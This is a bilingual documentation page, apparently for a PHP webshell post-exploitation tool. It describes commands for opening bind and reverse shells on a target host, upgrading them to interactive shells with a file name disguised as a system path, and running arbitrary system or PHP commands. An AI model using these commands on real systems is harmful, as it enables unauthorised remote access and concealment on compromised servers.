SHELL
命令
bs / bindshell
bind shell
Bind a port and wait for someone to connect to get a shell.
eg: bindshell {port=7777} {passwd=doughnuts}
Command Args:
--port [int] port (Default: 7777)
--passwd [str] passwd (Default: 'doughnuts')
用于在目标主机监听一个端口并设置密码,以等待受信任的管理者连接shell。格式为bindshell {监听端口} {密码}。
re / reverse
reverse
reverse shell to a host from target system.
eg: reverse {ip} {port} {type=php}
reverse_type:
- php
- python
Command Args:
--ip(*) [str] ip
-p,--port(*) [str] port
-type,--reverse_type [str] reverse_type (Default: 'php')
用于向指定的主机与端口反弹一个shell。格式为reverse {反弹ip} {反弹端口} {使用语言}。
rs / reshell
reshell
Bind a port and wait for target connect back to get a full shell.
eg: reshell {lhost} {port} {type=[python|script|upload]{1|2|3},default = 0 (Python:1 Not Python:3)} {(Only for Mode 2) fakename=/usr/lib/systemd}
Command Args:
-l,--lhost(*) [str] lhost
-p,--port(*) [int] port
-m,--mode [int] mode (Default: 0)
-f,--fakename [str] fakename (Default: '/usr/lib/systemd')
(这是一个试验功能!)(这个命令只用于双方系统都是*unix)用于监听本地端口并且等待目标返回一个完整交互式的shell。这个命令使用三种方式将shell转化为完整交互式shell:
python 需要拥有python环境
script 需要拥有script命令,
upload 需要在/tmp目录下写入文件并调用,支持使用--fakename参数伪装文件名
s /shell
shell
Get a temporary shell of target system by system function or just run a shell command.
Command Args:
--commands(*) [?] *commands
用于进入一个临时的交互式界面或者单纯的执行一句命令。直接使用shell命令进入一个临时的交互式界面,或使用shell command执行一句命令。
ws / webshell
webshell
Get a webshell of target system or just run a webshell command.
Command Args:
--commands(*) [?] *commands
用于进入一个临时的php交互式界面或者单纯的执行一句php代码。直接使用webshell命令进入一个临时的交互式界面,或使用webshell code执行一句php代码。
exec / execute
execute
execute Custom PHP code by notepad / vi or your own editor.
eg: execute {editor=""}
Command Args:
--editor [str] editor (Default: '')
用于执行自定义php代码。执行此命令将会调用notepad或vi进入临时编辑模式,在保存退出之后将会执行编辑的php代码。
最后更新于
这有帮助吗?